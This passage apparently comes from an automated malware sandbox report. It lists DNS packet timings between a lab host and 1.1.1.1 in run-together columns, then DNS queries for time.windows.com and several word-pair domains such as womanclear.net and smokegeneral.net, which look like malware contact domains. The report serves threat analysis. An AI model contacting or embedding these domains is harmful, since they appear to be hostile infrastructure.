                                                                                                                                                                                                          Aug 5, 2024 16:23:11.338663101 CEST5464053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.339821100 CEST53609581.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.584297895 CEST53546401.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.585304022 CEST5862053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.595113039 CEST53586201.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.596183062 CEST5806953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.607228041 CEST53580691.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.608077049 CEST5196753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.619980097 CEST53519671.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.620794058 CEST5161853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.869426966 CEST53516181.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.870515108 CEST5261153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.881941080 CEST53526111.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.882783890 CEST6431053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.123236895 CEST53643101.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.124109030 CEST6181653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.136425018 CEST53618161.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.137336016 CEST6472753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.148866892 CEST53647271.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.149853945 CEST6287953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.387614965 CEST53628791.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.388535023 CEST5546153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.403403044 CEST53554611.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.404055119 CEST5833753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.416208982 CEST53583371.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.419003010 CEST5604553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.669958115 CEST53560451.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.670917988 CEST5430453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690047026 CEST53543041.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690764904 CEST6071353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.703558922 CEST53607131.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.704890013 CEST5076353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.715862989 CEST53507631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.716545105 CEST5398553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.955599070 CEST53539851.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.956458092 CEST6015453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.972373962 CEST53601541.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.973203897 CEST6437653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.985363007 CEST53643761.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.986319065 CEST6143753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.998255014 CEST53614371.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.999150991 CEST5973053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.018498898 CEST53597301.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.019520044 CEST6322453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.264501095 CEST53632241.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.265332937 CEST5900353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.277185917 CEST53590031.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.278017044 CEST5577853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.313076973 CEST53557781.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.982986927 CEST4994453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.233246088 CEST53499441.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.234230995 CEST4928253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.253881931 CEST53492821.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.778151989 CEST5366953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.023370981 CEST53536691.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.024501085 CEST4943353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.035974026 CEST53494331.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.036873102 CEST5774453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.286478043 CEST53577441.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.287492990 CEST6074953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.529511929 CEST53607491.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.530410051 CEST5480153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.543267012 CEST53548011.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.543965101 CEST5706553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.786616087 CEST53570651.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.788389921 CEST5045353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.800870895 CEST53504531.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.802088022 CEST5044653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.817239046 CEST53504461.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.818175077 CEST5755253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.832911968 CEST53575521.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.833758116 CEST5298553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.076066017 CEST53529851.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.076986074 CEST6506353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.089200974 CEST53650631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.089977026 CEST5799853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.105436087 CEST53579981.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.106254101 CEST5538553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.116499901 CEST53553851.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.118916988 CEST5947053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.128622055 CEST53594701.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.135863066 CEST4945653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.147651911 CEST53494561.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.148502111 CEST6244153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.594046116 CEST53624411.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.111905098 CEST5797853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.131805897 CEST53579781.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.132673979 CEST5635853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.151833057 CEST53563581.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.155555010 CEST6046353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.166604042 CEST53604631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.176980972 CEST6070653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.492526054 CEST53607061.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.493551970 CEST6234453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.749679089 CEST53623441.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.629637957 CEST5643553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.664453030 CEST53564351.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.360114098 CEST5899053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.603269100 CEST53589901.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.604113102 CEST5138453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.041341066 CEST53513841.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.042613983 CEST5655553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.532397985 CEST53565551.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.354139090 CEST6274353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.594518900 CEST53627431.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.599212885 CEST6056453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.612550020 CEST53605641.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.615145922 CEST5042953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.626259089 CEST53504291.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.626872063 CEST5540753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.800091982 CEST53554071.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.801013947 CEST5357353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.050182104 CEST53535731.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.051450968 CEST5993253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.062438965 CEST53599321.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.063122034 CEST5048253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.307908058 CEST53504821.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.308860064 CEST5487553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.318873882 CEST53548751.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.321954966 CEST5829453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.333545923 CEST53582941.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.334274054 CEST5006253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.348253965 CEST53500621.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.349205017 CEST6403353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.364134073 CEST53640331.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.364785910 CEST5226253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.527837992 CEST53522621.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.528754950 CEST5485953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.563729048 CEST53548591.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.564809084 CEST5398553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.575617075 CEST53539851.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.576502085 CEST4987053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.586731911 CEST53498701.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.587383986 CEST5164053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.602020025 CEST53516401.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.602730989 CEST6304953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.852274895 CEST53630491.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.853321075 CEST5309353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.882518053 CEST53530931.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.543642044 CEST6199653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.785722971 CEST53619961.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.786580086 CEST5502853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.031197071 CEST53550281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.032265902 CEST5114053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.276823997 CEST53511401.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.278073072 CEST6106153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.289036989 CEST53610611.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.289673090 CEST5610353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.538819075 CEST53561031.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.539998055 CEST5126353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.549678087 CEST53512631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.550476074 CEST5057553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.718214989 CEST53505751.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.729669094 CEST5092853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.981952906 CEST53509281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.982945919 CEST5544653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.994797945 CEST53554461.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.995552063 CEST4973953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.008431911 CEST53497391.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.009118080 CEST6053053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.019424915 CEST53605301.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.019994974 CEST6177453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.272799015 CEST53617741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.274055004 CEST5384653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.603921890 CEST53538461.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.153218985 CEST5071153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.173346996 CEST53507111.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.174304962 CEST5619453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.184062004 CEST53561941.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.184897900 CEST5182753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.427146912 CEST53518271.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.428072929 CEST5229853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.439620018 CEST53522981.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.448745012 CEST6472953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.458301067 CEST53647291.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.460000992 CEST5124953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.470509052 CEST53512491.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.473237991 CEST5012353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.942564964 CEST53501231.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.647510052 CEST4956653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.891237020 CEST53495661.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.892193079 CEST6237253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.903814077 CEST53623721.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.904778004 CEST5265053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.914954901 CEST53526501.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:45.178628922 CEST5350058162.159.36.2192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:46.033658028 CEST53518441.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:19.329459906 CEST5756353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:19.342288017 CEST53575631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:20.344276905 CEST5989453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:20.593597889 CEST53598941.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:21.609978914 CEST5672353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:21.624454021 CEST53567231.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:22.641103029 CEST5185953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:22.656313896 CEST53518591.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:23.672787905 CEST6206353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:23.691430092 CEST53620631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:24.703435898 CEST5197353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:24.714538097 CEST53519731.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:25.719153881 CEST5706553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:25.730051994 CEST53570651.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:26.734932899 CEST5549953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:26.745863914 CEST53554991.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:27.750502110 CEST5964953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:27.762432098 CEST53596491.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:28.766252041 CEST5602853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:29.008287907 CEST53560281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:30.016100883 CEST5412053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:30.028261900 CEST53541201.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:31.033252954 CEST5281053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:31.274490118 CEST53528101.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:32.281800985 CEST5245653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:32.644752026 CEST53524561.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:33.656968117 CEST5971553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:33.900650978 CEST53597151.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:34.907303095 CEST6206753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:34.919079065 CEST53620671.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:35.922257900 CEST6310153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:36.160528898 CEST53631011.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:37.172446966 CEST5442253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:37.414206982 CEST53544221.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:38.422349930 CEST6214153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:38.432774067 CEST53621411.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:39.438189983 CEST5717553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:39.679007053 CEST53571751.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:40.688630104 CEST5985253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:40.700752974 CEST53598521.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:41.703542948 CEST6187553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:41.714907885 CEST53618751.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:42.719425917 CEST5193453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:42.730444908 CEST53519341.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:43.734996080 CEST5522953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:43.746114969 CEST53552291.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:44.753750086 CEST5947453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:44.764403105 CEST53594741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:45.766043901 CEST4927453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:45.778937101 CEST53492741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:46.781923056 CEST5533253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:47.033505917 CEST53553321.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:49.797646046 CEST6197453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:49.808259010 CEST53619741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:50.813277960 CEST5845153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:50.952276945 CEST53584511.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:51.969788074 CEST5783453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:51.980510950 CEST53578341.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:52.985311985 CEST5542853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:52.995425940 CEST53554281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:53.978466034 CEST5341453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:54.220349073 CEST53534141.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:55.157414913 CEST5688753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:55.169265985 CEST53568871.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.079106092 CEST5280653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.089919090 CEST53528061.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.969827890 CEST6490753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.982188940 CEST53649071.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:57.828845024 CEST4991753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:58.484996080 CEST53499171.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.438075066 CEST5789953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.447949886 CEST53578991.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.448775053 CEST5473953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.459800959 CEST53547391.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.460437059 CEST5938453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.473557949 CEST53593841.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.474095106 CEST6011353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.484698057 CEST53601131.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.485200882 CEST6170153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.497405052 CEST53617011.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.497925997 CEST6026153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.509195089 CEST53602611.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.509829044 CEST5469753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.670346975 CEST53546971.1.1.1192.168.2.7

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Aug 5, 2024 16:22:56.747797012 CEST192.168.2.71.1.1.10xf93dStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:58.827097893 CEST192.168.2.71.1.1.10x910aStandard query (0)womanclear.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.073581934 CEST192.168.2.71.1.1.10x7047Standard query (0)smokeclear.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.317177057 CEST192.168.2.71.1.1.10x94adStandard query (0)womangeneral.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.489187002 CEST192.168.2.71.1.1.10xeb47Standard query (0)smokegeneral.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.502075911 CEST192.168.2.71.1.1.10xdbbeStandard query (0)womaninclude.netA (IP address)IN (0x0001)false
